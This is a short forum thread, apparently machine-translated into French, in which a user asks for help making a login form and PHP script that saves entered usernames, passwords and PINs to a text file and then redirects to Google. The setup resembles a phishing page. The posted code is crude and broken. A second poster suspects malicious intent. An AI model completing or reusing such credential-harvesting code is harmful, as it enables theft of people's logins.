Aide avec mon formulaire de connexion!

• zerkky
  • Born
  • Born
  • No Avatar
  • Status: Offline

Message Mai 16th, 2010, 1:36 pm

Bon, alors j'ai fait un formulaire de connexion avec 3 zones de texte. J'ai aussi créé une image que le bouton «Soumettre». Lorsque vous cliquez sur soumettre, je veux que le php. Page pour stocker les données du formulaire rempli dans un document texte tout en réorientant vers une autre page (par exemple: l'épargne à password.txt et redirigeant vers un site comme Google). Sa ne fonctionne pas, alors Im ne sais pas si mon code HTML est foiré ou mon PHP. J'espère que vous pouvez nous aider!

Mon formulaire HTML:
Code: [ Select ]
<form name="login" id="login" action="login.php" method="POST">

User ID
<input type="text" name="txtId" id="txtId" class="input" value="" tabindex="1" size="20">

User P/W <input type="password" name="txtPassword" id="txtPassword" class="input" value="" tabindex="2" maxlength="12"><BR>

User PIC <input type="text" name="txtPIC" id="txtPIC" class="input" value="" tabindex="1" size="20">

<input type="image" src="login.gif" name="image" value="submit" alt="Submit button"></div></div>
</form>
  1. <form name="login" id="login" action="login.php" method="POST">
  2. User ID
  3. <input type="text" name="txtId" id="txtId" class="input" value="" tabindex="1" size="20">
  4. User P/W <input type="password" name="txtPassword" id="txtPassword" class="input" value="" tabindex="2" maxlength="12"><BR>
  5. User PIC <input type="text" name="txtPIC" id="txtPIC" class="input" value="" tabindex="1" size="20">
  6. <input type="image" src="login.gif" name="image" value="submit" alt="Submit button"></div></div>
  7. </form>

Mon script PHP & #058;
Code: [ Select ]
<?php
$fp = fopen(”password.txt”, “a”);
fwrite($fp, “Username:$_POST[txtId]\tPassword:$_POST[txtPassword]\tPIC:$_POST[txtPIC]”);
echo “<HTML>

<FRAMESET cols=\”*\”>
<FRAME src=\”google”>
</FRAMESET>”;
?>
  1. <?php
  2. $fp = fopen(”password.txt”, “a”);
  3. fwrite($fp, “Username:$_POST[txtId]\tPassword:$_POST[txtPassword]\tPIC:$_POST[txtPIC]”);
  4. echo “<HTML>
  5. <FRAMESET cols=\”*\”>
  6. <FRAME src=\”google”>
  7. </FRAMESET>”;
  8. ?>
  • Anonymous
  • Bot
  • No Avatar
  • Loc: Ozzuland
  • Status: Online

Message Mai 16th, 2010, 1:36 pm

• joebert
  • Sledgehammer
  • Genius
  • No Avatar
  • Loc: Florida
  • Status: Offline

Message Mai 16th, 2010, 2:24 pm

Soin d'expliquer la grande image de ce que vous faites?

Compte tenu de vos dernier fil A propos de noms d'utilisateurs grattage en plus à celui-ci sur la journalisation des noms d'utilisateur et mots de passe, il semble que vous êtes à rien de bon.
Strong with this one, the sudo is.

Afficher de l'information

• Total des messages de ce sujet: 2 messages
  • Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 253 invités